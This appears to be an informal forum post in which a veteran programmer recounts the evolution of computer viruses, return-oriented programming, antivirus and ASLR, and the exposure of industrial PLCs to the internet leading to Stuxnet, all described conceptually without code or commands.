I've never run antivirus, even when running a small company on all-windows. We were just careful and didn't fool around on the work machines. We captured, but didn't catch a lot of viruses, and since it was a software/product dev company, we had the right tools to look inside them. There's been quite an evolution of them. (We went to linux at some point, only running windows on Virtual Box or Soft-ICE and didn't surf from windows just in time to miss the drive-by virii from internet exploder, and in fact had already quit using it).
At first, nearly all the viruses we captured were obviously amateur, and written in Borland C, since it was free at the time. Dumb kids even left in the source (eg published the debug build) complete with comments. It was more amusing to laugh at than something to be worried about.
As the years went on, we started to see more serious stuff, built with pro tools - yes, there are traces left in parts of the binary that tell what compiler was used unless you very carefully strip them out - and it was obvious some seriously pro programmers were involved. Most of this stuff was financial theft kinds of things, trying to steal your identity or logins.
Then there were the "return oriented virus" models. Any called routine (and just about everything in any opsys was called at some point) sees it's parameters on the stack - including the return address to jump to when the routine is done. By pushing parameters and return addresses of system dll functions on the stack, a virus could be done with just about no actual code - just parameters and pointers to system functions that would do the same stuff for ya. Why re-invent the wheel and leave info that makes it easy to detect it's a virus (like explicit calls to file or internet functions?). During this time, the signature-based AV community came into being. It was no longer enough to look for code patterns, as many virii {sic?] didn't even really contain code - just a list of parameters and addresses. This is at best reactive, it can never catch a zero day, as there has to be a data pattern in the AV database that matches, which can only happen after an attack has been detected, reported, analyzed and added to the DB. Ow! It was about this time we switched opsys, since AV code was "eating" our nice shiny machines cycles too badly, and we wouldn't put up with that. Don't want to start an opsys war here - could be (though it isn't ) just that linux was a less-attacked target, ignoring the fact that it was derived from an opsys that ran all the computer-campus mainfraimes, and had already lived through some much more serious fire than anything else - highly motivated smart students wanting to hack to change grades, report tuition paid and so on, and experience most opsys never had to survive.
At any rate, ASLR (address space layout randomization) kind of helped with ROP (return oriented programming). All modern opsys do that now. But at first, MS opsys' didn't, for various reasons, mainly simplicity and speed - they loaded all the dlls (which are nearly all of windows itself, as well as any shared libraries) such that they all "looked" like they were in the exact same place every time, using x86 address relocation hardware registers to make that illusion work. Saved the cycles of having to find out where say, the file copy function was in a windows DLL every time. But made it possible to write that class of virus.
And now we have our own tax dollars (and those of other countries) being used against us, and the code has gotten to be really good. When I was in the biz, at first, the number of people who could code that well was small enough you could actually know all of them. And nothing that wanted security was on the internet, as there wasn't one - I even maintained the node for ARPA on the ARPANET, long before these PC things existed. We used phone company leased lines for anything that wanted to be secure. They were and are expensive.
So, along comes the wave of MBA types, saving money and this new internet thing - now everything could be done over one cable, and believe me, even with an expensive plan, it costs a lot less than even a T1 line (even now!). And silly people allowed to program.
Example: A friend who builds ethanol plants and is an industrial distillation expert, used PLCs (programmable logic controllers) to help automate a factory he builds for a customer - turn heat up and down, open and close valves, all that kind of thing. He's not really thinking of security, that's not his field, but really, security by obscurity worked out pretty well, for awhile. No one knew either the IP address on the 'net he put this stuff on, or how to talk to any of it if they did - even though it turns out the guys who built the PLC's in the first place were also clueless themselves about security. Then someone in the C suite wants real-time monitoring of their little money maker. So they tell my pal to assign this to a subnet of the corporate IP namespace, so the CEO and such can see it - and even control it, since by the original design, the only guys who were allowed to see a PLC were the guys who might need to emergency-control it. No thought was given to clueless jerks in the C suite and what they might demand, so as to have a read-only interface for them.
Heck, PLC's even started having embedded web servers. No one was thinking anything but how can I add some shiny feature to drive more sales. And most programmers get slapped down for mentioning this kind of thing is dangerous and just do what their technically ignorant boss wants. Got a family to feed. Yeah, it comes down to bucks, for most everything, most times, one way or another, although there's also the principle of "externalizing risk" that makes it even worse. The programmer can say "it's not my fault" because that's what the boss ordered. The boss can say "it's not my fault" because security should be handled by the grunts. So you get this circle jerk of finger pointing, something I may post here on some topic regarding stupid human nature and why things are so messed up due to it.
And now, we have power plants and stuff that can do real harm, with little to no security whatever out there where anyone can ping it and send it commands, especially if (as is usual) no one changed the default passwords and logins. And now that this has happened, well, someone thought to go to the PLC manufactures and buy the service manuals and have a go - and we now have Stuxnet and its friends.
Hard to say where this will all lead in the end, but it's something even the security biz poo-pooed at first, thinking no one in their right mind would expose ANY of this to the internet in the first place, they'd all grown up in the leased-line era.